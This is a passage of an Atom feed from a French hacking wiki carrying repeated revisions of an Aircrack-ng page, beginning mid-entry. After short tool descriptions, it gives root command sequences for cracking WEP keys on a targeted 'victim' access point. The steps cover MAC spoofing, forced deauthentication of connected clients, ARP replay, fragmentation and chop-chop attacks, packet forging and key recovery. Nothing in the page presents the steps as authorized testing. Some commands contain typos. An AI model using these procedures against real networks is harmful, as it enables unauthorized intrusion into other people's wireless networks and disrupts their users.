* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED''&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2008-12-20T19:57:41Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;big&amp;gt;&amp;lt;u&amp;gt;'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&amp;lt;/u&amp;gt;&amp;lt;/big&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Les drivers WiFi ==&lt;br /&gt;
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.&lt;br /&gt;
* Pour connaitre les drivers supportés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng supported&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers déjà installés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aidriver-ng installed&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers WiFi chargés dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng loaded&lt;br /&gt;
&lt;br /&gt;
* Pour détecter les cartes WiFi:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng detect&lt;br /&gt;
&lt;br /&gt;
* Pour décharger un driver inutile:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng unload $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour compiler un driver:&lt;br /&gt;
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airdriver-ng compile $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour installer un driver fraichement compilé:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng install $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour charger un driver dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng load $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour avoir des détails sur un driver:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng details $num_driver&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac_client $iface&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client et sans filtrage MAC'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED !!!''&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et &amp;quot;par fragmentation&amp;quot; ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
** En cas de filtrage MAC:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = déauthentification&lt;br /&gt;
&amp;lt;br /&amp;gt;1 = nombre de deauth à envoyer à la fois (0 -&amp;gt; indéfiniment)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP&lt;br /&gt;
&amp;lt;br /&amp;gt;''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED''&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
** En cas de filtrage MAC:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = déauthentification&lt;br /&gt;
&amp;lt;br /&amp;gt;1 = nombre de deauth à envoyer à la fois (0 -&amp;gt; indéfiniment)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP&lt;br /&gt;
&amp;lt;br /&amp;gt;''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED''&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2008-12-20T19:44:42Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;/* Mac spoofing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;big&amp;gt;&amp;lt;u&amp;gt;'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&amp;lt;/u&amp;gt;&amp;lt;/big&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Les drivers WiFi ==&lt;br /&gt;
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.&lt;br /&gt;
* Pour connaitre les drivers supportés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng supported&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers déjà installés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aidriver-ng installed&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers WiFi chargés dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng loaded&lt;br /&gt;
&lt;br /&gt;
* Pour détecter les cartes WiFi:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng detect&lt;br /&gt;
&lt;br /&gt;
* Pour décharger un driver inutile:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng unload $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour compiler un driver:&lt;br /&gt;
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airdriver-ng compile $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour installer un driver fraichement compilé:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng install $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour charger un driver dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng load $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour avoir des détails sur un driver:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng details $num_driver&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac $iface&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et &amp;quot;par fragmentation&amp;quot; ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
